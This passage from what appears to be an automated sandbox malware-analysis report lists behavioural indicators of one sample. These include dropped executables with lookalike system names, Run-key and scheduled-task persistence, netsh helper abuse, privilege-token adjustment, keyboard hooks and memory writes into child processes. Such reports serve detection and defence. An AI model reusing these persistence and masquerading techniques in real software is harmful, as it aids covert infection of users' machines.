File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2d790bed038373d95093d4db590b9997.exe C:\Windows\svehosts.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2d790bed038373d95093d4db590b9997.exe C:\Windows\svehosts.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Windows\svehosts.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
N/A N/A C:\Windows\svehosts.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\prndrvest.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\office = "C:\\Users\\Admin\\Documents\\excelsl.exe" C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\office = "C:\\Users\\Admin\\Documents\\excelsl.exe" C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2d790bed038373d95093d4db590b9997 = "\"C:\\Windows\\svehosts.exe\" .." C:\Windows\svehosts.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\2d790bed038373d95093d4db590b9997 = "\"C:\\Windows\\svehosts.exe\" .." C:\Windows\svehosts.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\svehosts.exe C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\notepad.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Documents\excelsl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\notepad.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\prndrvest.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svehosts.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Documents\excelsl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\fI87ltOJhCNhEwlw\eridjeht.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\svehosts.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\Documents\excelsl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\prndrvest.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9Wr8gF4Xq79ka0w0\svrhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\svehosts.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\svehosts.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Documents\excelsl.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Documents\excelsl.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\heCYMLXIPI2fpGWa\svuhost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4648 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe
PID 4648 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe
PID 4648 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\YObJeC5tg36kFOoe.exe
PID 4648 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe
PID 4648 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe
PID 4648 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe
PID 4648 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe
PID 4648 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe
PID 4648 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\Mp0HWlzrSg87QaV8.exe
PID 4648 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe
PID 4648 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe
PID 4648 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\udrJjp2RG0loj1PU.exe
PID 4648 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe
PID 4648 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe
PID 4648 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6iXvjvwz5Rb02A5q.exe
PID 4648 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe
PID 4648 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe
PID 4648 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\JoDXj0pYvsREMInD.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 4648 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\42f972925508a82236e8533567487761.exe C:\Users\Admin\AppData\Local\Temp\6ax0Yc8236t6EQMa\svthost.exe
PID 3252 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 3252 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 3252 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 3252 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 3252 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 3252 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 3252 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
PID 3252 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\n2AFIgvIdMVR67bm.exe C:\Users\Admin\AppData\Local\Temp\RJCisDErBR6WU7D5\svbhost.exe
